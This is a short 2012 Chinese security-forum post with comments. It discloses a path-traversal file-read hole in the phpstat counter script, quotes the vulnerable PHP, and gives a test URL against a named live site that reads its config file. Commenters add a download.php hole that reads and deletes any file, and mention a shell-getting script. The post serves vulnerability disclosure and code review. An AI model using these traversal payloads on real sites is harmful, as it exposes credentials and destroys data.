phpstat 读文件

2012-10-19 21:39:24 13 2243
./count/count.com.php
$website = $_GET[website];
        $image = $_GET[image];
        //确定图片
        if(!$image)
        $imagesrc = "../templates/".TPL_NAME."/".TPL_IMGDIR."/icos/countlogo1.gif";
        else
        $imagesrc = "../templates/".TPL_NAME."/".TPL_IMGDIR."/icos/".$image;
        //发送图片
       
    header("Content-type: image/gif");
        readfile($imagesrc);
        @flush();
很2B,看一个站的时候发现。。
test
http://media.phpstat.net/count/count.com.php?image=../../../../include.inc/config.inc.php

关于作者

评论13次

要评论?请先  登录  或  注册
  • 13楼
    2012-10-22 00:05

    有时间,找这套源码来读读....看来问题不少

  • 12楼
    2012-10-22 00:04

    上面这里不成了任意删除么? unlink($fpath)了。。。。。

  • 11楼
    2012-10-21 10:42

    神奇。。

  • 10楼
    2012-10-20 23:51

    这个我也看到了。不过目标站着几个文件被删了,我就没怎么看了

  • 9楼
    2012-10-20 20:19

    懂的站长一个 basename 函数漏洞就没用鸟===========================================官方没有找到(phpstat3.2)../download.php 23==>$fpath = strval($_GET['fpath']); 25==>$file = fopen($fpath, "r");30==>fread echo fread($file, filesize($fpath));

      <?  /* 本软件版权归作者所有,在投入使用之前注意获取许可 作者:程威(wiwiboy) 项目:PCS流量统计 3.0 电话:13553166317 邮箱:[email]wiwiboy@126.com[/email] QQ号:158839753 网址:[url]http://www.pcs.net[/url] pcs.net保留全部权力,受相关法律和国际              公约保护,请勿非法修改、转载、散播,或用于其他赢利行为,         并请勿删除版权声明。  */  /*     verson:v3.0 20060618    author:wiwiboy    last update:2006/10/14   */  /*    xml.cxv,txt文件下载页  */    $fname = strval($_GET[fname]);    $fpath = strval($_GET[fpath]);    if(!file_exists($fpath))exit;    $file=fopen($fpath,"r");    Header("Content-type: application/octet-stream");    Header("Accept-Ranges: bytes");    Header("Accept-Length: ".filesize($fpath));    Header("Content-Disposition: attachment; filename=" . $fname."");    echo fread($file,filesize($fpath));    fclose($file);    @unlink($fpath);  ?>
    ../getcode.phpgetshell支持lz

  • 8楼
    2012-10-20 17:00

    开发人员太放松警惕了,居然什么检查都不做就直接扔到函数里了

  • 7楼
    2012-10-20 12:27
  • 6楼
    2012-10-20 10:38

    弯的four

  • 5楼
    2012-10-20 00:00

    readfile flush 两函数也要加入到工具里扫了 算是危险函数了

  • 4楼
    2012-10-19 23:01

    挤一挤。

  • 3楼
    2012-10-19 22:44

    这个犀利了。。。。连截断都不用。。。。。

  • 2楼
    2012-10-19 22:44

    八错。。呵呵

  • 1楼
    2012-10-19 22:19